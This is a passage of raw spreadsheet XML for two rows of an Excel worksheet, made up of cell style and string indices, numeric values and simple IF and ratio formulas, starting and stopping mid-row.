      </c>
      <c r="CE60" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF60" s="104" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CG60" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH60" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI60" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ60" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK60" s="104">
        <v>0.0</v>
      </c>
      <c r="CL60" s="104">
        <v>0.0</v>
      </c>
      <c r="CM60" s="105">
        <v>1.0</v>
      </c>
      <c r="CN60" s="105">
        <v>0.0</v>
      </c>
      <c r="CO60" s="105">
        <v>0.0</v>
      </c>
      <c r="CP60" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ60" s="105">
        <v>0.0</v>
      </c>
      <c r="CR60" s="105">
        <v>0.0</v>
      </c>
      <c r="CS60" s="105">
        <v>0.0</v>
      </c>
      <c r="CT60" s="105">
        <v>0.0</v>
      </c>
      <c r="CU60" s="105">
        <v>0.0</v>
      </c>
      <c r="CV60" s="105">
        <v>0.0</v>
      </c>
      <c r="CW60" s="105">
        <v>0.0</v>
      </c>
      <c r="CX60" s="105">
        <v>0.0</v>
      </c>
      <c r="CY60" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ60" s="105">
        <v>0.0</v>
      </c>
      <c r="DA60" s="105">
        <v>0.0</v>
      </c>
      <c r="DB60" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC60" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD60" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE60" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF60" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG60" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH60" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI60" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ60" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK60" s="107">
        <f t="shared" ref="DK60:DK120" si="104">(CS60+CT60)/(N60+O60)</f>
        <v>0</v>
      </c>
      <c r="DL60" s="106">
        <f t="shared" ref="DL60:DL120" si="105">IF(AND(OR(DD60=0,DD60="-"),DK60=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="DM60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN60" s="108">
        <v>0.0</v>
      </c>
      <c r="DO60" s="108">
        <v>0.0</v>
      </c>
      <c r="DP60" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR60" s="108">
        <v>0.0</v>
      </c>
      <c r="DS60" s="108">
        <v>0.0</v>
      </c>
      <c r="DT60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV60" s="108" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DW60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ60" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA60" s="108">
        <v>0.0</v>
      </c>
      <c r="EB60" s="108">
        <v>0.0</v>
      </c>
      <c r="EC60" s="109">
        <v>1.0</v>
      </c>
      <c r="ED60" s="109">
        <v>0.0</v>
      </c>
      <c r="EE60" s="109">
        <v>0.0</v>
      </c>
      <c r="EF60" s="109">
        <v>0.0</v>
      </c>
      <c r="EG60" s="109">
        <v>0.0</v>
      </c>
      <c r="EH60" s="109">
        <v>0.0</v>
      </c>
      <c r="EI60" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ60" s="109">
        <v>0.0</v>
      </c>
      <c r="EK60" s="109">
        <v>0.0</v>
      </c>
      <c r="EL60" s="109">
        <v>0.0</v>
      </c>
      <c r="EM60" s="109">
        <v>0.0</v>
      </c>
      <c r="EN60" s="109">
        <v>0.0</v>
      </c>
      <c r="EO60" s="109">
        <v>0.0</v>
      </c>
      <c r="EP60" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ60" s="109">
        <v>0.0</v>
      </c>
      <c r="ER60" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES60" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET60" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU60" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV60" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW60" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX60" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY60" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ60" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA60" s="110">
        <f t="shared" ref="FA60:FA120" si="106">(EI60+EJ60)/(N60+O60)</f>
        <v>0</v>
      </c>
      <c r="FB60" s="110">
        <f t="shared" ref="FB60:FB120" si="107">IF(AND(OR(ET60=0,ET60="-"),FA60=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="FC60" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD60" s="111">
        <v>2.0</v>
      </c>
      <c r="FE60" s="111">
        <v>4.0</v>
      </c>
      <c r="FF60" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG60" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH60" s="111">
        <v>0.0</v>
      </c>
      <c r="FI60" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ60" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK60" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL60" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM60" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN60" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO60" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP60" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ60" s="111">
        <v>0.0</v>
      </c>
      <c r="FR60" s="111">
        <v>0.0</v>
      </c>
      <c r="FS60" s="112">
        <v>1.0</v>
      </c>
      <c r="FT60" s="112">
        <v>1.0</v>
      </c>
      <c r="FU60" s="112">
        <v>2.0</v>
      </c>
      <c r="FV60" s="112">
        <v>0.0</v>
      </c>
      <c r="FW60" s="112">
        <v>4.0</v>
      </c>
      <c r="FX60" s="112">
        <v>4.0</v>
      </c>
      <c r="FY60" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ60" s="112">
        <v>0.0</v>
      </c>
      <c r="GA60" s="112">
        <v>0.0</v>
      </c>
      <c r="GB60" s="112">
        <v>0.0</v>
      </c>
      <c r="GC60" s="112">
        <v>0.0</v>
      </c>
      <c r="GD60" s="112">
        <v>0.0</v>
      </c>
      <c r="GE60" s="112">
        <v>0.0</v>
      </c>
      <c r="GF60" s="112">
        <v>0.0</v>
      </c>
      <c r="GG60" s="112">
        <v>0.0</v>
      </c>
      <c r="GH60" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI60" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ60" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK60" s="113">
        <f t="shared" si="42"/>
        <v>2</v>
      </c>
      <c r="GL60" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM60" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN60" s="113">
        <f t="shared" si="45"/>
        <v>4</v>
      </c>
      <c r="GO60" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP60" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ60" s="114">
        <f t="shared" ref="GQ60:GQ120" si="108">(FY60+FZ60)/(N60+O60)</f>
        <v>0</v>
      </c>
      <c r="GR60" s="113">
        <f t="shared" ref="GR60:GR120" si="109">IF(AND(OR(GJ60=0,GJ60="-"),GQ60=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="GS60" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT60" s="94"/>
      <c r="GU60" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV60" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW60" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF60" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG60" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH60" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI60" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ60" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK60" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL60" s="93">
        <v>1.0</v>
      </c>
      <c r="HM60" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN60" s="93">
        <v>0.0</v>
      </c>
      <c r="HO60" s="93">
        <v>0.0</v>
      </c>
      <c r="HP60" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ60" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR60" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS60" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT60" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU60" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV60" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW60" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX60" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC60" s="120" t="str">
        <f t="shared" ref="IC60:IC63" si="110">HV60</f>
        <v>-</v>
      </c>
      <c r="ID60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH60" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II60" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ60" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK60" s="99">
        <v>1.0</v>
      </c>
      <c r="IL60" s="99">
        <v>0.0</v>
      </c>
      <c r="IM60" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN60" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO60" s="98">
        <v>0.0</v>
      </c>
      <c r="IP60" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ60" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR60" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS60" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT60" s="127"/>
      <c r="IU60" s="127"/>
      <c r="IV60" s="127"/>
      <c r="IW60" s="127"/>
      <c r="IX60" s="127"/>
      <c r="IY60" s="127"/>
      <c r="IZ60" s="127"/>
      <c r="JA60" s="127"/>
      <c r="JB60" s="127"/>
      <c r="JC60" s="127"/>
      <c r="JD60" s="127"/>
      <c r="JE60" s="127"/>
      <c r="JF60" s="127"/>
      <c r="JG60" s="127"/>
      <c r="JH60" s="127"/>
      <c r="JI60" s="127"/>
      <c r="JJ60" s="127"/>
      <c r="JK60" s="127"/>
      <c r="JL60" s="127"/>
      <c r="JM60" s="127"/>
      <c r="JN60" s="127"/>
      <c r="JO60" s="127"/>
      <c r="JP60" s="127"/>
      <c r="JQ60" s="127"/>
      <c r="JR60" s="127"/>
      <c r="JS60" s="127"/>
      <c r="JT60" s="127"/>
      <c r="JU60" s="127"/>
      <c r="JV60" s="127"/>
      <c r="JW60" s="127"/>
      <c r="JX60" s="127"/>
      <c r="JY60" s="127"/>
      <c r="JZ60" s="127"/>
      <c r="KA60" s="127"/>
      <c r="KB60" s="127"/>
      <c r="KC60" s="127"/>
      <c r="KD60" s="127"/>
      <c r="KE60" s="127"/>
      <c r="KF60" s="127"/>
      <c r="KG60" s="127"/>
      <c r="KH60" s="127"/>
      <c r="KI60" s="127"/>
      <c r="KJ60" s="127"/>
      <c r="KK60" s="127"/>
      <c r="KL60" s="127"/>
      <c r="KM60" s="127"/>
      <c r="KN60" s="127"/>
      <c r="KO60" s="127"/>
      <c r="KP60" s="127"/>
      <c r="KQ60" s="127"/>
      <c r="KR60" s="127"/>
      <c r="KS60" s="127"/>
      <c r="KT60" s="127"/>
      <c r="KU60" s="127"/>
      <c r="KV60" s="127"/>
      <c r="KW60" s="127"/>
      <c r="KX60" s="127"/>
      <c r="KY60" s="127"/>
      <c r="KZ60" s="127"/>
      <c r="LA60" s="127"/>
      <c r="LB60" s="127"/>
      <c r="LC60" s="127"/>
      <c r="LD60" s="127"/>
      <c r="LE60" s="127"/>
      <c r="LF60" s="127"/>
      <c r="LG60" s="127"/>
      <c r="LH60" s="127"/>
      <c r="LI60" s="127"/>
      <c r="LJ60" s="127"/>
      <c r="LK60" s="127"/>
      <c r="LL60" s="127"/>
      <c r="LM60" s="127"/>
      <c r="LN60" s="127"/>
      <c r="LO60" s="127"/>
      <c r="LP60" s="127"/>
      <c r="LQ60" s="127"/>
      <c r="LR60" s="127"/>
      <c r="LS60" s="127"/>
      <c r="LT60" s="127"/>
      <c r="LU60" s="127"/>
      <c r="LV60" s="127"/>
      <c r="LW60" s="127"/>
      <c r="LX60" s="127"/>
      <c r="LY60" s="127"/>
      <c r="LZ60" s="127"/>
      <c r="MA60" s="127"/>
      <c r="MB60" s="127"/>
      <c r="MC60" s="127"/>
      <c r="MD60" s="127"/>
      <c r="ME60" s="127"/>
      <c r="MF60" s="127"/>
      <c r="MG60" s="127"/>
      <c r="MH60" s="127"/>
      <c r="MI60" s="127"/>
      <c r="MJ60" s="127"/>
      <c r="MK60" s="127"/>
      <c r="ML60" s="127"/>
      <c r="MM60" s="127"/>
      <c r="MN60" s="127"/>
      <c r="MO60" s="127"/>
      <c r="MP60" s="127"/>
      <c r="MQ60" s="127"/>
      <c r="MR60" s="127"/>
      <c r="MS60" s="127"/>
      <c r="MT60" s="127"/>
      <c r="MU60" s="127"/>
      <c r="MV60" s="127"/>
      <c r="MW60" s="127"/>
      <c r="MX60" s="127"/>
      <c r="MY60" s="127"/>
      <c r="MZ60" s="127"/>
      <c r="NA60" s="127"/>
      <c r="NB60" s="127"/>
      <c r="NC60" s="127"/>
      <c r="ND60" s="127"/>
      <c r="NE60" s="127"/>
      <c r="NF60" s="127"/>
      <c r="NG60" s="127"/>
      <c r="NH60" s="127"/>
      <c r="NI60" s="127"/>
      <c r="NJ60" s="127"/>
      <c r="NK60" s="127"/>
      <c r="NL60" s="127"/>
      <c r="NM60" s="127"/>
      <c r="NN60" s="127"/>
      <c r="NO60" s="127"/>
      <c r="NP60" s="127"/>
      <c r="NQ60" s="127"/>
      <c r="NR60" s="127"/>
      <c r="NS60" s="127"/>
      <c r="NT60" s="127"/>
      <c r="NU60" s="127"/>
      <c r="NV60" s="127"/>
      <c r="NW60" s="127"/>
      <c r="NX60" s="127"/>
      <c r="NY60" s="127"/>
    </row>
    <row r="61" ht="153.75" customHeight="1">
      <c r="B61" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C61" s="90" t="s">
        <v>1200</v>
      </c>
      <c r="D61" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E61" s="90" t="s">
        <v>1201</v>
      </c>
      <c r="F61" s="90" t="s">
        <v>1202</v>
      </c>
      <c r="G61" s="90" t="s">
        <v>1203</v>
      </c>
      <c r="H61" s="90" t="s">
        <v>1204</v>
      </c>
      <c r="I61" s="92" t="s">
        <v>1205</v>
      </c>
      <c r="J61" s="92" t="s">
        <v>1206</v>
      </c>
      <c r="K61" s="92" t="s">
        <v>1207</v>
      </c>
      <c r="L61" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M61" s="93">
        <v>5.0</v>
      </c>
      <c r="N61" s="93">
        <v>1.0</v>
      </c>
      <c r="O61" s="93">
        <v>0.0</v>
      </c>
      <c r="P61" s="93">
        <v>1.0</v>
      </c>
      <c r="Q61" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R61" s="93">
        <v>1.0</v>
      </c>
      <c r="S61" s="93">
        <v>0.0</v>
      </c>
      <c r="T61" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U61" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V61" s="126" t="s">
        <v>1208</v>
      </c>
      <c r="W61" s="96" t="s">
        <v>1209</v>
      </c>
      <c r="X61" s="97" t="s">
        <v>1210</v>
      </c>
      <c r="Y61" s="96" t="s">
        <v>1211</v>
      </c>
      <c r="Z61" s="96" t="s">
        <v>1212</v>
      </c>
      <c r="AA61" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB61" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC61" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD61" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE61" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF61" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG61" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH61" s="99" t="s">
        <v>1213</v>
      </c>
      <c r="AI61" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ61" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL61" s="100">
        <v>0.0</v>
      </c>
      <c r="AM61" s="100">
        <v>0.0</v>
      </c>
      <c r="AN61" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP61" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ61" s="100">
        <v>0.0</v>
      </c>
      <c r="AR61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT61" s="100" t="str">
        <f t="shared" si="101"/>
        <v>-</v>
      </c>
      <c r="AU61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX61" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY61" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ61" s="100">
        <v>0.0</v>
      </c>
      <c r="BA61" s="102">
        <v>5.0</v>
      </c>
      <c r="BB61" s="102">
        <v>0.0</v>
      </c>
      <c r="BC61" s="102">
        <v>0.0</v>
      </c>
      <c r="BD61" s="102">
        <v>0.0</v>
      </c>
      <c r="BE61" s="102">
        <v>0.0</v>
      </c>
      <c r="BF61" s="102">
        <v>0.0</v>
      </c>
      <c r="BG61" s="102">
        <v>0.0</v>
      </c>
      <c r="BH61" s="102">
        <v>0.0</v>
      </c>
      <c r="BI61" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ61" s="102">
        <v>0.0</v>
      </c>
      <c r="BK61" s="102">
        <v>0.0</v>
      </c>
      <c r="BL61" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM61" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN61" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO61" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP61" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ61" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR61" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS61" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT61" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU61" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV61" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX61" s="104">
        <v>0.0</v>
      </c>
      <c r="BY61" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ61" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB61" s="104">
        <v>0.0</v>
      </c>
      <c r="CC61" s="104">
        <v>0.0</v>
      </c>
      <c r="CD61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF61" s="104" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CG61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ61" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK61" s="104">
        <v>0.0</v>
      </c>
      <c r="CL61" s="104">
        <v>0.0</v>
      </c>
      <c r="CM61" s="105">
        <v>5.0</v>
      </c>
      <c r="CN61" s="105">
        <v>0.0</v>
      </c>
      <c r="CO61" s="105">
        <v>0.0</v>
      </c>
      <c r="CP61" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ61" s="105">
        <v>0.0</v>
      </c>
      <c r="CR61" s="105">
        <v>0.0</v>
      </c>
      <c r="CS61" s="105">
        <v>0.0</v>
      </c>
      <c r="CT61" s="105">
        <v>0.0</v>
      </c>
      <c r="CU61" s="105">
        <v>0.0</v>
      </c>
      <c r="CV61" s="105">
        <v>0.0</v>
      </c>
      <c r="CW61" s="105">
        <v>0.0</v>
      </c>
      <c r="CX61" s="105">
        <v>0.0</v>
      </c>
      <c r="CY61" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ61" s="105">
        <v>0.0</v>
      </c>
      <c r="DA61" s="105">
        <v>0.0</v>
      </c>
      <c r="DB61" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC61" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD61" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE61" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF61" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG61" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH61" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI61" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ61" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK61" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL61" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN61" s="108">
        <v>0.0</v>
      </c>
      <c r="DO61" s="108">
        <v>0.0</v>
      </c>
      <c r="DP61" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR61" s="108">
        <v>0.0</v>
      </c>
      <c r="DS61" s="108">
        <v>0.0</v>
      </c>
      <c r="DT61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV61" s="108" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DW61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ61" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA61" s="108">
        <v>0.0</v>
      </c>
      <c r="EB61" s="108">
        <v>0.0</v>
      </c>
      <c r="EC61" s="109">
        <v>5.0</v>
      </c>
      <c r="ED61" s="109">
        <v>0.0</v>
      </c>
      <c r="EE61" s="109">
        <v>0.0</v>
      </c>
      <c r="EF61" s="109">
        <v>0.0</v>
      </c>
      <c r="EG61" s="109">
        <v>0.0</v>
      </c>
      <c r="EH61" s="109">
        <v>0.0</v>
      </c>
      <c r="EI61" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ61" s="109">
        <v>0.0</v>
      </c>
      <c r="EK61" s="109">
        <v>0.0</v>
      </c>
      <c r="EL61" s="109">
        <v>0.0</v>
      </c>
      <c r="EM61" s="109">
        <v>0.0</v>
      </c>
      <c r="EN61" s="109">
        <v>0.0</v>
      </c>
      <c r="EO61" s="109">
        <v>0.0</v>
      </c>
      <c r="EP61" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ61" s="109">
        <v>0.0</v>
      </c>
      <c r="ER61" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES61" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET61" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU61" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV61" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW61" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX61" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY61" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ61" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA61" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB61" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC61" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD61" s="111">
        <v>2.0</v>
      </c>
      <c r="FE61" s="111">
        <v>4.0</v>
      </c>
      <c r="FF61" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG61" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH61" s="111">
        <v>0.0</v>
      </c>
      <c r="FI61" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ61" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK61" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL61" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM61" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN61" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO61" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP61" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ61" s="111">
        <v>0.0</v>
      </c>
      <c r="FR61" s="111">
        <v>0.0</v>
      </c>
      <c r="FS61" s="112">
        <v>5.0</v>
      </c>
      <c r="FT61" s="112">
        <v>2.0</v>
      </c>
      <c r="FU61" s="112">
        <v>2.0</v>
      </c>
      <c r="FV61" s="112">
        <v>0.0</v>
      </c>
      <c r="FW61" s="112">
        <v>4.0</v>
      </c>
      <c r="FX61" s="112">
        <v>4.0</v>
      </c>
      <c r="FY61" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ61" s="112">
        <v>0.0</v>
      </c>
      <c r="GA61" s="112">
        <v>0.0</v>
      </c>
      <c r="GB61" s="112">
        <v>0.0</v>
      </c>
      <c r="GC61" s="112">
        <v>0.0</v>
      </c>
      <c r="GD61" s="112">
        <v>0.0</v>
      </c>
      <c r="GE61" s="112">
        <v>0.0</v>
      </c>
      <c r="GF61" s="112">
        <v>0.0</v>
      </c>
      <c r="GG61" s="112">
        <v>0.0</v>
      </c>
      <c r="GH61" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI61" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ61" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK61" s="113">
        <f t="shared" si="42"/>
        <v>2</v>
      </c>
      <c r="GL61" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM61" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN61" s="113">
        <f t="shared" si="45"/>
        <v>4</v>
      </c>
      <c r="GO61" s="113">
        <f t="shared" si="46"/>
